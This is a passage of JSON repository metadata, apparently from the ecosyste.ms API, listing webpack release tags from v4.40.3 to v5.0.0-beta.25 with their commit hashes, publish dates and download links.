//repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fweb